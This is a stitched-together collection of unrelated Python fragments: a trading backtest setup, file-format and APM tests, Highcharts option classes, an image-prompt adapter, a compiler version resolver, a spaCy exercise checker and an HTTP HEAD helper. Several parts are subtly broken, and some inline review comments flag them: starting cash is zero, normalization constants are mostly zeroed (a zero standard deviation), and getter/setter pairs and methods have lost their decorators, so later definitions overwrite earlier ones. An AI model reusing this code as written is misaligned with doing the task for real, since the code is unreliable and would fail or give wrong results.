    # NOTE(review): starting cash is literally 0.0 (`.0`) — presumably a
    # garbled constant (e.g. a real starting balance); verify before trusting
    # the portfolio values logged below.
    cerebro.broker.setcash(.0)
    cerebro.broker.addcommissioninfo(KiwoomOpenApiPlusCommInfo())
    logging.info('Setting strategy')
    cerebro.addstrategy(OrclStrategy, printlog=True)
    logging.info('Starting Portfolio Value: %.2f', cerebro.broker.getvalue())
    cerebro.run()
    logging.info('Final Portfolio Value: %.2f', cerebro.broker.getvalue())
def test_entries_size_0_values(tmpdir, merge_lis_prs):
    """A DFSR whose entries all have size 0 yields None for every entry value."""
    fpath = os.path.join(str(tmpdir), 'entries-size-0.lis')
    content = ((headers + ['data/lis/records/curves/dfsr-entries-size-0.lis.part']) + trailers)
    merge_lis_prs(fpath, content)
    with lis.load(fpath) as (f,):
        dfs = f.data_format_specs()[0]
        assert len(dfs.entries) == 16
        entry_values = {entry.type: entry.value for entry in dfs.entries}
        assert entry_values[0] == None
        none_valued_attrs = (
            'record_type', 'spec_block_type', 'frame_size', 'direction',
            'optical_log_depth_units', 'reference_point', 'reference_point_units',
            'spacing', 'spacing_units', 'max_frames', 'absent_value',
            'depth_mode', 'depth_units', 'depth_reprc', 'spec_block_subtype',
        )
        for attribute in none_valued_attrs:
            # `== None` (not `is`) kept deliberately to match the original
            # equality semantics of the dlisio attribute objects.
            assert getattr(dfs, attribute) == None
class OptionSeriesHeatmapSonificationContexttracksMappingTremoloDepth(Options):
    """Highcharts `series.heatmap.sonification.contextTracks.mapping.tremolo.depth` options.

    NOTE(review): each option appears as a getter/setter pair sharing one
    name — the @property/@<name>.setter decorators appear to have been
    stripped during extraction; as written, the second def overrides the first.
    """

    def mapFunction(self):
        # Getter: no default until configured.
        return self._config_get(None)

    def mapFunction(self, value: Any):
        # Setter: js_type=False — stored as data, not emitted as raw JS.
        self._config(value, js_type=False)

    def mapTo(self):
        return self._config_get(None)

    def mapTo(self, text: str):
        self._config(text, js_type=False)

    def max(self):
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def within(self):
        return self._config_get(None)

    def within(self, value: Any):
        self._config(value, js_type=False)
class IPAdapter(Generic[T], fl.Chain, Adapter[T]):
    """Image-prompt adapter wiring CLIP image embeddings into a target's cross-attention layers.

    NOTE(review): ``clip_image_encoder`` / ``grid_image_encoder`` /
    ``image_proj`` are *used* as attributes (e.g. ``self.image_proj.num_tokens``)
    yet *defined* as zero-argument methods below — ``@property`` decorators
    appear to have been lost in extraction; likewise ``convert_to_grid_features``
    takes no ``self`` and is presumably a ``@staticmethod``. Confirm against
    the original source.
    """

    # Single-element lists keep these modules out of the fl.Chain child
    # registry while still holding a reference.
    _clip_image_encoder: list[CLIPImageEncoderH]
    _grid_image_encoder: list[CLIPImageEncoderH]
    _image_proj: list[fl.Module]

    def __init__(self, target: T, clip_image_encoder: CLIPImageEncoderH, image_proj: fl.Module, scale: float=1.0, fine_grained: bool=False, weights: (dict[(str, Tensor)] | None)=None) -> None:
        """Wrap `target`, attach one CrossAttentionAdapter per non-self attention layer, and optionally load weights."""
        with self.setup_adapter(target):
            super().__init__(target)
        self.fine_grained = fine_grained
        self._clip_image_encoder = [clip_image_encoder]
        if fine_grained:
            # Fine-grained mode uses per-patch (grid) features instead of the pooled embedding.
            self._grid_image_encoder = [self.convert_to_grid_features(clip_image_encoder)]
        self._image_proj = [image_proj]
        # Adapt every cross-attention (i.e. every Attention that is not a SelfAttention).
        self.sub_adapters = [CrossAttentionAdapter(target=cross_attn, scale=scale, image_sequence_length=self.image_proj.num_tokens) for cross_attn in filter((lambda attn: (type(attn) != fl.SelfAttention)), target.layers(fl.Attention))]
        if (weights is not None):
            # Checkpoint layout: 'image_proj.*' for the projector,
            # 'ip_adapter.<iii>.*' for the i-th cross-attention adapter.
            image_proj_state_dict: dict[(str, Tensor)] = {k.removeprefix('image_proj.'): v for (k, v) in weights.items() if k.startswith('image_proj.')}
            self.image_proj.load_state_dict(image_proj_state_dict)
            for (i, cross_attn) in enumerate(self.sub_adapters):
                cross_attn_state_dict: dict[(str, Tensor)] = {}
                for (k, v) in weights.items():
                    prefix = f'ip_adapter.{i:03d}.'
                    if (not k.startswith(prefix)):
                        continue
                    cross_attn_state_dict[k.removeprefix(prefix)] = v
                cross_attn.load_state_dict(state_dict=cross_attn_state_dict)

    def clip_image_encoder(self) -> CLIPImageEncoderH:
        # Pooled-feature CLIP image encoder (see NOTE on missing @property above).
        return self._clip_image_encoder[0]

    def grid_image_encoder(self) -> CLIPImageEncoderH:
        # Only built when fine_grained=True was passed to __init__.
        assert hasattr(self, '_grid_image_encoder')
        return self._grid_image_encoder[0]

    def image_proj(self) -> fl.Module:
        return self._image_proj[0]

    def inject(self: 'TIPAdapter', parent: (fl.Chain | None)=None) -> 'TIPAdapter':
        """Inject every cross-attention sub-adapter, then this adapter itself."""
        for adapter in self.sub_adapters:
            adapter.inject()
        return super().inject(parent)

    def eject(self) -> None:
        """Eject every cross-attention sub-adapter, then this adapter itself."""
        for adapter in self.sub_adapters:
            adapter.eject()
        super().eject()

    def set_scale(self, scale: float) -> None:
        # Propagate the image-conditioning strength to all sub-adapters.
        for cross_attn in self.sub_adapters:
            cross_attn.scale = scale

    def compute_clip_image_embedding(self, image_prompt: Tensor) -> Tensor:
        """Return negative and conditional image embeddings concatenated along the batch axis."""
        image_encoder = (self.clip_image_encoder if (not self.fine_grained) else self.grid_image_encoder)
        clip_embedding = image_encoder(image_prompt)
        conditional_embedding = self.image_proj(clip_embedding)
        if (not self.fine_grained):
            # Negative = projection of a zeroed embedding.
            negative_embedding = self.image_proj(zeros_like(clip_embedding))
        else:
            # Fine-grained negative = projection of the encoding of a black image.
            clip_embedding = image_encoder(zeros_like(image_prompt))
            negative_embedding = self.image_proj(clip_embedding)
        return cat((negative_embedding, conditional_embedding))

    def preprocess_image(self, image: Image.Image, size: tuple[(int, int)]=(224, 224), mean: (list[float] | None)=None, std: (list[float] | None)=None) -> Tensor:
        """Resize and normalize a PIL image into a tensor on the target's device/dtype.

        NOTE(review): the default mean/std values below look truncated compared
        to the usual CLIP normalization constants (several channels are 0.) —
        confirm against the original source before trusting these defaults.
        """
        return normalize(image_to_tensor(image.resize(size), device=self.target.device, dtype=self.target.dtype), mean=([0., 0.4578275, 0.] if (mean is None) else mean), std=([0., 0., 0.] if (std is None) else std))

    def convert_to_grid_features(clip_image_encoder: CLIPImageEncoderH) -> CLIPImageEncoderH:
        """Clone the encoder and strip its pooling head so it emits per-patch (grid) features.

        NOTE(review): no ``self`` parameter — presumably a @staticmethod whose
        decorator was lost in extraction.
        """
        encoder_clone = clip_image_encoder.structural_copy()
        # Drop the final Lambda -> LayerNorm -> Linear pooled-projection head.
        assert isinstance(encoder_clone[(- 1)], fl.Linear)
        assert isinstance(encoder_clone[(- 2)], fl.LayerNorm)
        assert isinstance(encoder_clone[(- 3)], fl.Lambda)
        for _ in range(3):
            encoder_clone.pop()
        # Also drop the last of the 32 transformer layers.
        transfomer_layers = encoder_clone[(- 1)]
        assert (isinstance(transfomer_layers, fl.Chain) and (len(transfomer_layers) == 32))
        transfomer_layers.pop()
        return encoder_clone
# Fix: the decorator lost its '@pytest.mark' prefix (the bare '.parametrize(...)'
# line was a syntax error); restored so the fixture is parametrized again.
@pytest.mark.parametrize('elasticapm_client', [{'span_stack_trace_min_duration': 0}], indirect=True)
def test_transaction_span_stack_trace_min_duration_no_limit(elasticapm_client):
    """With span_stack_trace_min_duration=0, every span gets a stacktrace regardless of duration."""
    elasticapm_client.begin_transaction('test_type')
    # Zero-duration span and a 40ms span — both should capture frames.
    with elasticapm.capture_span('frames'):
        pass
    with elasticapm.capture_span('frames', duration=0.04):
        pass
    elasticapm_client.end_transaction('test')

    spans = elasticapm_client.events[constants.SPAN]
    assert len(spans) == 2
    assert spans[0]['name'] == 'frames'
    assert spans[0]['stacktrace'] is not None
    assert spans[1]['name'] == 'frames'
    assert spans[1]['stacktrace'] is not None
def find_best_vyper_version(contract_sources: Dict[(str, str)], install_needed: bool=False, install_latest: bool=False, silent: bool=True) -> str:
    """Return the vyper version compatible with every given source's pragma.

    Args:
        contract_sources: mapping of source path -> source code.
        install_needed: install the newest compatible version if none is installed.
        install_latest: install the newest compatible version if it is newer
            than the newest installed one.
        silent: suppress the "new version available" notice.

    Returns:
        The chosen version as a string.

    Raises:
        IncompatibleVyperVersion: when no installable (or, without the install
            flags, no installed) version satisfies all pragmas.
    """
    available_versions, installed_versions = _get_vyper_version_list()

    # Narrow both candidate lists by each source file's pragma spec in turn.
    for path, source in contract_sources.items():
        pragma_spec = sources.get_vyper_pragma_spec(source, path)
        installed_versions = [v for v in installed_versions if v in pragma_spec]
        available_versions = [v for v in available_versions if v in pragma_spec]

    # Guard clauses: nothing installable at all, or nothing installed and no
    # permission to install.
    if not available_versions:
        raise IncompatibleVyperVersion('No installable vyper version compatible across all sources')
    if not installed_versions and not (install_needed or install_latest):
        raise IncompatibleVyperVersion('No installed vyper version compatible across all sources')

    newest_available = max(available_versions)
    newest_installed = max(installed_versions, default=Version('0.0.0'))
    if newest_available > newest_installed:
        if install_latest or (install_needed and not installed_versions):
            install_vyper(newest_available)
            return str(newest_available)
        if not silent:
            print(f'New compatible vyper version available: {max(available_versions)}')
    return str(max(installed_versions))
def test():
    # Exercise checker run by the course framework: `__solution__` (the
    # learner's submitted code as text), `doc`, and `__msg__` are injected
    # into the global namespace by the grader before this is called.
    # Assert order matters — the first failing check's message is shown.
    assert ('from spacy.tokens import Doc' in __solution__), 'Importes-tu correctement la classe Doc ?'
    assert (doc.text == 'spaCy est cool.'), "Es-tu certain d'avoir cree correctement le Doc ?"
    assert ('print(doc.text)' in __solution__), 'Affiches-tu le texte du Doc ?'
    __msg__.good('Bien joue !')
class OptionPlotoptionsVariwideSonificationDefaultinstrumentoptionsMappingPan(Options):
    # Accessor pairs for the Highcharts sonification `mapping.pan` option
    # group (mapFunction / mapTo / max / min / within).
    #
    # NOTE(review): each getter/setter pair below shares one name with no
    # @property / @<name>.setter decorators visible, so as written the second
    # `def` simply shadows the first. Presumably the decorators were lost in
    # extraction (sibling classes in this file show the same pattern) —
    # confirm against the original source before relying on getter behavior.

    def mapFunction(self):
        return self._config_get(None)

    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    def mapTo(self):
        return self._config_get(None)

    def mapTo(self, text: str):
        self._config(text, js_type=False)

    def max(self):
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def within(self):
        return self._config_get(None)

    def within(self, value: Any):
        self._config(value, js_type=False)
def urlHead(url, timeout=3, allow_redirects=True):
    """Issue an HTTP HEAD request and report success.

    Args:
        url: Target URL; falsy values short-circuit to a failure result.
        timeout: Seconds before the request is abandoned.
        allow_redirects: Whether redirects are followed.

    Returns:
        ``(True, requests.Response)`` on success, ``(False, {})`` on any
        falsy URL or request failure (kept for caller compatibility).
    """
    if not url:
        return (False, {})
    try:
        resp = requests.head(url, timeout=timeout, allow_redirects=allow_redirects)
        return (True, resp)
    except requests.RequestException as e:
        # Narrowed from a blanket `except Exception`: only network/HTTP errors
        # are expected here; programming errors now propagate instead of being
        # silently swallowed.
        print(f'[ERROR] urlHead failed: {e}')
        return (False, {})